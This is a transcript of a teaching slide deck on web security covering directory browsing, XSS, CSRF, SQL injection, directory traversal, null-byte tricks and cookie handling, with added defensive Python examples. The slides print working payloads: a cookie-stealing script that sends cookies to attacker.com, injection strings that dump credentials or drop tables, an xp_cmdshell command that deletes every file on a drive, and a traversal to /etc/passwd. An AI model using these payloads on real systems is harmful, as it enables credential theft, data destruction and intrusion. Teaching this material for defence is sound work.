Comp Foo pt 7: Web Security - PowerPoint PPT Presentation

Provided by: x10sec
Slides: 25

Transcript and Presenter's Notes

1
Comp Foo pt 7: Web Security
  • Directory browsing
  • XSS & CSRF
  • SQL injection
  • Directory traversal
  • Mistaken assumptions
  • Poison null byte
  • Cookie security

2
Directory Browsing
  • When you request a directory from a web server,
    it first looks for an index page to return. If
    it's not found, it then checks the server
    configuration to see if it should show a listing
    of all the files in the directory.
  • This can be very, very useful to an attacker and
    may even constitute a vulnerability in itself.

3
Directory Browsing: Defense
  • To disable this feature, simply place a file
    named .htaccess in the directory you want to
    affect and place the following in it:
  • Options -Indexes

4
OR
  • If you're the type of person who likes to do such
    things, you could instead enable it in a
    particular directory by using
  • Options Indexes

5
XSS and CSRF
  • XSS and CSRF stand for cross-site scripting and
    cross-site request forgery, respectively.
  • Why not CSS? Well, because that was taken.
  • So what are they?

6
XSS and CSRF
  • They are attacks which involve executing script
    in the browsers of other users. The difference
    between them lies simply in the exploitation.
  • Cross site scripting involves the stealing of
    data, usually cookies, and cross site request
    forgery involves forcing a user to submit an HTTP
    request.

7
Cross site scripting
  • A common way to launch an XSS attack is to insert
    some sort of scripting into a webpage (such as
    writing it into an entry in a guestbook which
    doesn't check for scripting) which sends the
    cookie as part of a GET request to a logging
    script on a remote server.
  • Example
  • <script>
  • document.location='http://www.attacker.com/cookielogger.php?cookie='+document.cookie
  • </script>

8
Cross site request forgery
  • The same is true for CSRF.
  • Example
  • <script>
  • document.location='admin/addadmin.php?id=134'
  • </script>

9
Cross site scripting filters
  • Often, cross site scripting filters are possible
    to bypass by crafting the code specially. For
    instance, if a filter only blocks single quotes,
    one could define a regex literal and then use its
    source property to obtain a string, without quotes.
  • Example
  • <script>a=/hooray/;alert(a.source)</script>
  • Google the XSS cheat sheet to see a huge number
    of ways to bypass various filters.
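As an added example (not code from the slides), the deck's two payloads above are embedded as constructed input, run through a blocklist filter that only strips single quotes (the bypass case just described) and through context-aware output encoding of a guestbook entry, which leaves no markup for the browser to execute:

```python
# Added example, not from the slides: a single-quote blocklist filter versus
# HTML output encoding, checked against the deck's two payloads.
import html
import re

# The two payloads from the slides, embedded here as constructed test input.
COOKIE_THIEF = ("<script>document.location='http://www.attacker.com/"
                "cookielogger.php?cookie='+document.cookie</script>")
NO_QUOTES = "<script>a=/hooray/;alert(a.source)</script>"

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def quote_blocklist(entry):
    """Naive filter from the slides: strip single quotes and nothing else."""
    return entry.replace("'", "")


def render_entry(entry):
    """Encode the entry for an HTML text context before it reaches the page."""
    return "<li>" + html.escape(entry, quote=True) + "</li>"


def reaches_browser_as_script(rendered):
    """True if a <script> tag survives as real markup in the rendered HTML."""
    return SCRIPT_TAG.search(rendered) is not None
```

The blocklist leaves the quote-free payload untouched, while the encoded entry is displayed as literal text regardless of which characters it contains.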

10
SQL Injection
  • SQL injection flaws involve changing the nature
    of an SQL query by crafting special input to be
    placed in that query.
  • Earlier, I gave the example of
  • ' or ''='
  • to bypass WHERE clauses.
  • Let's take a look at some other interesting
    injection strings.

11
UNION SELECT
  • The UNION SELECT operator combines two queries
    and returns results as if they were from one
    query. The two queries must have the same number
    of columns requested, with the same types of data
    for each column.
  • Consider the following SQL query:
  • SELECT title, text FROM articles WHERE id=<id>
  • (<id> is replaced by user input)

12
UNION SELECT
  • Consider if <id> was
  • -1 UNION SELECT user, pass FROM mysql.users
  • That would make the query look like this:
  • SELECT title, text FROM articles WHERE id=-1
    UNION SELECT user, pass FROM mysql.users
  • Which would likely not return any articles, and
    in their place would be the usernames and hashed
    passwords of the users for the database.

13
Multiple statements
  • Consider this injection string, if you will:
  • 3;DROP articles
  • making the query look like
  • SELECT title, text FROM articles WHERE id=3;DROP
    articles

14
Commenting
  • In many database systems, -- and # have special
    meaning. They are comment delimiters, like //.
  • So, consider the following query:
  • SELECT user, pass FROM users WHERE user='<user>'
    AND pass='<hashed pass>'
  • Our old injection string,
  • ' or ''='
  • will not work in the password field, since the
    input will be hashed and will then consist of hex
    characters, so we cannot nullify that WHERE clause.

15
Commenting
  • But what if we entered
  • ' or ''=''--
  • as the username, and a junk password?
  • SELECT user, pass FROM users WHERE user='' or
    ''=''--' AND pass='md5(junkpassword)'
  • Everything after the double dash is ignored.
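As an added example (not code from the slides), both the article lookup from the UNION SELECT slides and the login query above are built once by splicing the input into the SQL text and once with bound parameters, against a constructed in-memory SQLite database (standing in for the deck's MySQL tables); the table and user names are made up for the example:

```python
# Added example, not from the slides: vulnerable (string-spliced) versus
# hardened (parameterised) versions of the deck's two queries.
import hashlib
import sqlite3


def make_db():
    """Constructed sample data standing in for the slides' tables."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER, title TEXT, text TEXT)")
    con.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    con.execute("INSERT INTO articles VALUES (3, 'Hello', 'First post')")
    con.execute("INSERT INTO users VALUES ('admin', ?)",
                (hashlib.md5(b"s3cret").hexdigest(),))
    return con


def vulnerable_article(con, user_id):
    # Query shape from the slides: untrusted text spliced into the SQL.
    return con.execute(
        f"SELECT title, text FROM articles WHERE id={user_id}").fetchall()


def safe_article(con, user_id):
    # Enforce the type first, then bind: the input can only ever be a value.
    try:
        article_id = int(user_id)
    except ValueError:
        return []  # not an integer id: nothing to look up
    return con.execute("SELECT title, text FROM articles WHERE id=?",
                       (article_id,)).fetchall()


def vulnerable_login(con, user, password):
    # The '--' trick works here because the username is spliced in raw.
    hashed = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(f"SELECT user FROM users WHERE user='{user}' "
                      f"AND pass='{hashed}'").fetchone()
    return row is not None


def safe_login(con, user, password):
    # Bound parameters: quotes and comment markers stay inside the value.
    hashed = hashlib.md5(password.encode()).hexdigest()
    row = con.execute("SELECT user FROM users WHERE user=? AND pass=?",
                      (user, hashed)).fetchone()
    return row is not None
```

With the slides' inputs the spliced versions return the users row and accept the junk password, while the bound versions return nothing and reject it.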

16
Microsoft SQL Server stored procedures
  • Microsoft SQL Server has some pretty interesting
    stored procedures. One, xp_cmdshell, will execute
    a specified command from a query.
  • So, if we go back to our article query, this
    injection string would be interesting.
  • 3;EXEC master..xp_cmdshell 'del C:\*.* /f /s /q'

17
Microsoft Jet DB
  • An interesting thing to note is that Microsoft
    Jet DB has what Microsoft calls an undocumented
    feature which allows VBScript execution in the
    middle of strings.
  • All you need to do is specify a command to be
    executed between pipe characters.

18
Directory Traversal
  • Directory traversal is crafting input in order to
    use resources outside the intended directory,
    usually with elevated privileges.
  • Example
  • http://www.victim.com/viewfile.cgi?file=../../../../../../../../etc/passwd

19
Mistaken assumptions
  • If you have a picture rating site and expect
    people to only be able to vote from 1-5 because
    that's what's in the user interface, you'll be
    awfully surprised when someone votes 23.
  • This is just one possibility.

20
Poison NULL byte
  • This has to do with the way that different tiers
    of a multi-tiered application handle null bytes.
  • Take for example a Perl script running on a web
    server which serves the contents of files
    specified by a variable. It checks to see that
    the string ends in .html, and then it opens the
    file.
  • Perl does not use null bytes as string
    delimiters, so admin.pl%00.html matches. However,
    the operating system interprets the null byte as
    a delimiter when it is called upon to open the
    file, and it returns the contents of admin.pl.

21
Poison NULL byte
  • An example of a similar flaw can be found in a
    script which checks an img tag's src attribute to
    make sure it ends in .jpg, .gif, or .png.
  • Similar to the usage of the NULL byte, we can
    place a pound sign before the .jpg and have
    ourselves a nice little CSRF attack.
  • Example: /admin/admin.pl?action=addadmin&id=3#.jpg
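As an added example (not code from the slides), one validation routine for the file-serving script described on the directory traversal and poison NULL byte slides, plus the image-URL check done on the URL path instead of the raw attribute string. The base directory and file names are constructed, and the file parameter is assumed to be already URL-decoded (so %00 has become an actual NUL byte):

```python
# Added example, not from the slides: reject ../ traversal and the poison
# NUL byte in one place, and test image suffixes on the URL path only.
import os
from urllib.parse import urlsplit


def safe_resolve(base_dir, requested, suffixes=(".html",)):
    """Return the absolute path to serve, or None if the request is unsafe."""
    # 1. A NUL byte is legal in a Perl/Python string but ends the name at the
    #    OS open() call, so a suffix check alone does not cover what is opened.
    if "\x00" in requested:
        return None
    # 2. Check the extension on the exact string that will be opened.
    if not requested.endswith(suffixes):
        return None
    # 3. Normalise and make sure the result is still inside base_dir.
    base = os.path.abspath(base_dir)
    target = os.path.abspath(os.path.join(base, requested))
    # commonpath avoids the prefix trap where /srv/www-old would pass a plain
    # startswith("/srv/www") test.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def naive_is_image(url):
    """The slides' flawed check: suffix test on the whole attribute value."""
    return url.endswith((".jpg", ".gif", ".png"))


def is_image_url(url):
    """Test the suffix on the URL path, so '#.jpg' or '?x=.jpg' cannot pass."""
    return urlsplit(url).path.lower().endswith((".jpg", ".gif", ".png"))
```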

22
Cookie security
  • The thing to remember about cookies is that they
    are client side. They are also delicious.
  • But mostly, client side.

23
Choco choco chip
  • Cookies can be modified, and read. Occasionally,
    as we know, they can be stolen. As such, you
    should avoid using non-session cookies to verify
    a login, and you should have the sessions expire
    after a reasonable amount of time.

24
Oatmeal raisin
  • I have seen, and it is sad but true, a cookie
    labeled admin=0 on a few websites.
  • Yeah, guess what happened after that?
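As an added example (not code from the slides), the server-side alternative to an admin=0 cookie: a session cookie whose body is HMAC-signed and carries an expiry, re-verified on every request so that an edited flag or a stale cookie is rejected. SECRET, SESSION_TTL and the helper names are constructed for this example:

```python
# Added example, not from the slides: HMAC-signed, expiring session cookie.
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-example-key-keep-out-of-source-control"
SESSION_TTL = 30 * 60  # seconds: the "reasonable amount of time"


def _sign(payload):
    return hmac.new(SECRET, payload, hashlib.sha256).digest()


def issue_cookie(user, is_admin, now=None):
    """Cookie value is base64(payload).base64(hmac); the flag is server-signed."""
    now = time.time() if now is None else now
    payload = json.dumps({"u": user, "a": bool(is_admin),
                          "exp": now + SESSION_TTL}).encode()
    return (base64.urlsafe_b64encode(payload) + b"." +
            base64.urlsafe_b64encode(_sign(payload))).decode()


def verify_cookie(cookie, now=None):
    """Return the session dict, or None if malformed, tampered or expired."""
    now = time.time() if now is None else now
    try:
        payload_b64, sig_b64 = cookie.encode().split(b".", 1)
        payload = base64.urlsafe_b64decode(payload_b64)
        sig = base64.urlsafe_b64decode(sig_b64)
    except ValueError:  # no separator or bad base64 (binascii.Error)
        return None
    # constant-time comparison: no timing side channel on the signature
    if not hmac.compare_digest(sig, _sign(payload)):
        return None
    session = json.loads(payload)
    return None if session["exp"] < now else session


def with_edited_payload(cookie, **changes):
    """Simulate a client editing the cookie body but keeping the old signature."""
    payload_b64, sig_b64 = cookie.split(".", 1)
    session = json.loads(base64.urlsafe_b64decode(payload_b64))
    session.update(changes)
    body = base64.urlsafe_b64encode(json.dumps(session).encode()).decode()
    return body + "." + sig_b64
```

Send it with the HttpOnly and Secure attributes so the cookie-logger script from the XSS slide cannot read it through document.cookie.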